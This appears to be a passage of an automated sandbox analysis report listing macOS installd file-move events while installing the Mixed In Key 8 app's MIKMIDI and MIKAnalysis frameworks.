              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_rBbKVV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISynthesizer_SubclassMethods.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_U1TEbw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPlayer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Jhi0ui -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEvent_SubclassMethods.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_Cc4SYU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIErrors.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_U38Jvm -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIUtilities.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_oBpBPe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteOnCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_MQ7O2I -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISystemMessageCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_j8tSYe -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaTimeSignatureEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_JcA1M1 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/NSUIApplication+MIKMIDI.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_wJFeop -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingGenerator.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_nYbDRM -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIClientDestinationEndpoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_R8sZtk -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPolyphonicKeyPressureEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_DWEdKu -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappingManager.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_LuF5rS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEndpoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_5NvGXt -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDINoteOffCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_2Faiy8 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDI.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_fb7ypo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIProgramChangeEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_twCvxV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIDevice.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_GSzyQV -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIPort.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_TeQHmE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMappableResponder.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_cOdoeU -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDITrack.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_n8xvax -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIMetaMarkerTextEvent.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_txQs4N -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIEndpointSynthesizer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_9Xk61H -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIChannelVoiceCommand.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_EXEU77 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDISourceEndpoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/.BC.T_WVgpyo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Headers/MIKMIDIClientSourceEndpoint.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Modules/.BC.T_G1b2lw -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKMIDI.framework/Versions/A/Modules/module.modulemapJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/.BC.T_ltvtWH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/libswiftQuartzCore.dylibJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignature/.BC.T_2voPfS -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/_CodeSignature/CodeResourcesJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/.BC.T_c9uuWH -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/MIKAnalysisJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeaders/.BC.T_mcOfTc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/PrivateHeaders/MIKVolumeAnalysis.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/en.lproj/.BC.T_muzg7J -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/en.lproj/InfoPlist.stringsJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/.BC.T_O2c6xo -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Resources/Info.plistJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_xdKrcn -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKBeats.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_qAbHyx -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKEnergyAnalyzer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_yJVAeB -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAudioSpectrum.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_je5O5S -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKKeyAnalyzer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_IyDVdE -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysisSegment.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_Y6mCvi -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKAnalysis.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_QFr6uW -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKKeyTable.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_UokQOc -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKNewKeyAnalyzer.hJump to behavior
              Source: /System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd (PID: 735)Framework directory File moved: /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/.BC.T_qddJ39 -> /var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications//Mixed In Key 8.app/Contents/Frameworks/MIKAnalysis.framework/Versions/A/Headers/MIKWaveformAnalyzer.hJump to behavior
